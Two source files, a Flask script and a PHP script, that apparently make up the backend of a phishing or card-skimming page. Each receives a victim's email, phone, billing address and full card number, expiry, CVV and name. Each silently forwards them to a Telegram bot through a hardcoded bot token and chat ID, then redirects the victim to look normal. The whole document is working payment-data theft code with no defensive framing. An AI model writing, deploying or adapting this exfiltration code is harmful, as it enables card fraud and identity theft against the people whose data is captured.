File: exfil.py
from flask import Flask, request, jsonify
import requests
from datetime import datetime

app = Flask(__name__)

# Telegram credentials (hardcoded as in original)
TG_TOKEN = "8887451622:AAGGo0bZSUKjMPWIqRd5fWY_OvLZajnvee0"
TG_CHAT  = "8653611398"

@app.route('/', methods=['POST'])
def webhook():
    # 1. Read and validate JSON input
    data = request.get_json()
    if not data:
        return jsonify({"error": "no data"})

    # 2. Gather client info
    ip = request.remote_addr or 'UNKNOWN'
    timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')

    # 3. Extract fields with defaults
    email = data.get('email', '')
    phone = data.get('phone', '')
    card = data.get('card', {})
    billing = data.get('billing_address', {})

    # 4. Build the Telegram message (preserves original formatting)
    msg = (
        f"** UPDATE - DATA CAPTURED\n"
        f"#TIME# {timestamp} | 🌍 {ip}\n"
        f"●EMAIL● {email}\n"
        f"[PHONW] {phone}\n"
        f"^ADDY^ {billing.get('street', '')}, {billing.get('city', '')}, "
        f"{billing.get('state', '')} {billing.get('zip', '')}\n"
        f"■CPAN■ Card: {card.get('number', '')} | Exp: {card.get('expiry', '')} | "
        f"CVV: {card.get('cvv', '')} | Name: {card.get('name', '')}"
    )

    # 5. Send to Telegram (non‑blocking, errors ignored like the original @curl_exec)
    try:
        url = f"https://api.telegram.org/bot{TG_TOKEN}/sendMessage"
        payload = {
            'chat_id': TG_CHAT,
            'text': msg,
            'parse_mode': 'HTML'
        }
        requests.post(url, data=payload, timeout=5)
    except Exception:
        pass  # silently ignore

    # 6. Respond with JSON
    return jsonify({"status": "ok", "redirect": "/account"})

if __name__ == '__main__':
    app.run(debug=True)   # Remove debug=True in production

File: exfil.php
<?php
$TG_TOKEN = "8887451622:AAGGo0bZSUKjMPWIqRd5fWY_OvLZajnvee0";
$TG_CHAT  = "8653611398";
$input = json_decode(file_get_contents('php://input'), true);
if (!$input) { echo json_encode(["error" => "no data"]); exit; }
$ip = $_SERVER['REMOTE_ADDR'] ?? 'UNKNOWN';
$time = date('Y-m-d H:i:s');
$card = $input['card'] ?? [];
$billing = $input['billing_address'] ?? [];
$msg = "** UPDATE - DATA CAPTURED\n";
$msg .= "#TIME# {$time} | 🌍 {$ip}\n";
$msg .= "●EMAIL● {$input['email']}\n";
$msg .= "[PHONW] {$input['phone']}\n";
$msg .= "^ADDY^ {$billing['street']}, {$billing['city']}, {$billing['state']} {$billing['zip']}\n";
$msg .= "■CPAN■ Card: {$card['number']} | Exp: {$card['expiry']} | CVV: {$card['cvv']} | Name: {$card['name']}";
$ch = curl_init("https://api.telegram.org/bot{$TG_TOKEN}/sendMessage");
curl_setopt_array($ch, [
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query(['chat_id' => $TG_CHAT, 'text' => $msg, 'parse_mode' => 'HTML']),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_TIMEOUT => 5
]);
@curl_exec($ch);
curl_close($ch);

echo json_encode(["status" => "ok", "redirect" => "/account"]);
exit;
?>